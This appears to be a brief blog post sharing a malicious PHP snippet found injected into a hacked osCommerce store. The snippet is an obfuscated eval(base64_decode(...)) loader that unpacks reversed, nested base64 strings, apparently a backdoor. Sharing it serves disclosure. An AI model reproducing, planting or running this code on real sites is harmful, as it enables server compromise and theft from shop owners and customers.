A encoded script in one of the hacked sites using oscommerce

 A code that was injected to one of the oscommerce sites

<?php eval(base64_decode("ZnVuY3Rpb24gZXZhbGhJT29MZ0xLWlltdEooJHMpe2ZvciAoJGEgPSAwOyAkYSA8PSBzdHJsZW4oJHMpLTE7ICRhKysgKXskZSAuPSAkc3tzdHJsZW4oJHMpLSRhLTF9O31yZXR1cm4oJGUpO31ldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPTAzT3BBVFdMbEdUUnhtYzBsa1VxNTBUc0ZtZGxSQ0tsUjJialZHWmZSak5sTlhZaUJpYnlWSGRsSjNlZ2tDTVp0VWFNRkZieVJYU1NwbVRQeFdZMlZHSm9rMVNweFVVc0pIZEpKbGFPOUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGhJT29MZ0xLWlltdEooJzspKSI9c1RLaTBUUDNKV2IxY1ZZaWdTV0xsR1RSeG1jMGxrVXE1MFRzRm1kbEJTUGdFMVFTRjNZVGwzVklKbFJ5UlZUNXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiN2tpSTkwRVNraG1Vek1tSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWjlNa1laSlZkaGhsZXhsRVMzVjBhd3hXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPXNUS2kwVFBCTkdNU2hVWWlnU1dMbEdUUnhtYzBsa1VxNTBUc0ZtZGwxamUybFhlcVYwWmhSM1EycEhjRnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPXNUS2kwRE5YRm1Jb2sxU3B4VVVzSkhkSkpsYU85RWJoWlhaOXNXWVNCWFNpVkVWaHAxVWl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsaElPb0xnTEtaWW10SignOykpIj1zVEtpMFRQUmxrZGtkVlNpZ1NXTGxHVFJ4bWMwbGtVcTUwVHNGbWRsMVRUbnQwUnZoWFRIUlZTWVprVGF4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsaElPb0xnTEtaWW10SignOykpIj09d09kbGlJVlZUVlNoa1J3ZzFVV0JUVldsalJWVmxVR05sSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWmJKVlJXSlZSVDlGSjlVRmJKRm5heGQyUkpwMmR6eFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGhJT29MZ0xLWlltdEooJzspKSI9PXdPcGtpSTkwelpqeEdldGxGZEcxV1ZpZ1NXTGxHVFJ4bWMwbGtVcTUwVHNGbWRsQkNMcElDTldka1cxWjBWWEpDS1p0VWFNRkZieVJYU1NwbVRQeFdZMlZHSXNraUk5a0VXYUpEYkhGbWFLaFZXbVowVmhKQ0tadFVhTUZGYnlSWFNTcG1UUHhXWTJWR0lza2lJd2tUYlI5a1RXUmxJb2sxU3B4VVVzSkhkSkpsYU85RWJoWlhaZ3dTS2kwVFF1TldNNEpUVmlnU1dMbEdUUnhtYzBsa1VxNTBUc0ZtZGxCQ0xwSUNiNEpqVzJsak1TSkNLWnRVYU1GRmJ5UlhTU3BtVFB4V1kyVkdLNUZtY3lGR0k5QVNZNmhIU3Y1V1FtbFVlUWRtZHp4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsaElPb0xnTEtaWW10SignOykpIj09d09STmtVeE4yVTVkRlNTWmtjVTFVZXNGbWRsUlNQdVExYk0xV1NZTjNUWGhFWllaRmJoWlhaa0FTS2dzeUtwUkNJN1VESTl3RElwUkNJN0FESTlBU2FrZ0NJeTltWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGhJT29MZ0xLWlltdEooJzspKSI3a1NLaTBUUFJaMk5ybDNZcmRXZWpCVE5YcEZNMUlqWXFsalJreEdaeWdGYjRkVll0SlVSSlZuU1lSR01XMTJZM0kwVUxwblVEdGtlajFtV25Sak1pQm5VemtWZFc1bVdpZ1NXTGxHVFJ4bWMwbGtVcTUwVHNGbWRsaENiaFpYWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGhJT29MZ0xLWlltdEooJzspKSI9PXdPUk5rVXhOMlU1ZEZTU1prY1UxVWVzRm1kbFJpTGk0aUk5NENJVTlHVHRsRVd6OTBWSVJHV1d4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsaElPb0xnTEtaWW10SignOykpIjkxM094azFTcHhVVXNKSGRKSmxhTzlFYmhaWFprQXlib05XWjcwVk1iRlRXTGxHVFJ4bWMwbGtVcTUwVHNGbWRsUkNJOUFTTVp0VWFNRkZieVJYU1NwbVRQeFdZMlZHSmdzVEt4azFTcHhVVXNKSGRKSmxhTzlFYmhaWFprd1NUbnQwUnZoWFRIUlZTWVprVGF4V1kyVkdKb1VHWnZ4R2M0VkdJOUFTTVp0VWFNRkZieVJYU1NwbVRQeFdZMlZHSjdsU0tOZDJTSDlHZU5kRVZKaGxST3BGYmhaWFprd1NNWnRVYU1GRmJ5UlhTU3BtVFB4V1kyVkdKb0lIZHpKSGR6aENJbWwyT3BrU1hwSVNWT0ZEVkpsalJWVmxVR05sSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWmJKVlJXSlZSVDlGSm9VR1p2Tm1ibHhtYzE1U0tpa3padHBrSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWnVrU1ZzbFVjcUYzWkhsa2EzTkhiaFpYWmtnU1prOTJZdVZHYnlWbkxwSVNPSjFtU2lnU1dMbEdUUnhtYzBsa1VxNTBUc0ZtZGw1U1hwSVNQSlprVUZaRU1ZWmtVeFFsVFd0V1ZpZ1NXTGxHVFJ4bWMwbGtVcTUwVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvazFTcHhVVXNKSGRKSmxhTzlFYmhaWFp1a2lJOWdEUmpKQ0tadFVhTUZGYnlSWFNTcG1UUHhXWTJWbUxwSXliQzVHVGlnU1dMbEdUUnhtYzBsa1VxNTBUc0ZtZGw1eWFoSkZjSkpXUlVGbVdUSkdiaFpYWms0U0tpMFRQM3hrSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWnVRMWJNMVdTWU4zVFhoRVpZWkZiaFpYWms0U0tpMERPNXhrSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWnVraUk5MHpaUEpDS1p0VWFNRkZieVJYU1NwbVRQeFdZMlZtTDZaWGU1cFdSbkZHZERabmV3VkViaFpYWmtneU1uWkdJOUFTTVp0VWFNRkZieVJYU1NwbVRQeFdZMlZHSmdzVEt3QURPd0V6S3BnU1p0bEdkc2tTS2kwVFRJUkdhU056WWlnU1dMbEdUUnhtYzBsa1VxNTBUc0ZtZGxoU05rMUdMREpXV1NWWFlZcFhjSmgwZEZ0R2NzRm1kbFJDS2xsMmF2OTJZMFYyY0FCeWVnVTJjc1ZHSTl0SElwa1NLZE5rWVpKVmRoaGxleGxFUzNWMGF3eFdZMlZHSmJWVVNMOTBURDlGSm9RWFp6Tlhhb0FpY3ZCU0twVUZiSkZuYXhkMlJKcDJkenhXWTJWR0pnd2lJcDlpSWc0Q0lwRW1lNGgwYnVGa1pKbEhVblozY3NGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTs="));?>

Comments

Popular posts from this blog

Black screen after logging in on Windows 2012 R2 using domain credentials on remote desktop connection

Client denied by server configuration error

Can't use proxy because no authentication schemes are fully configured.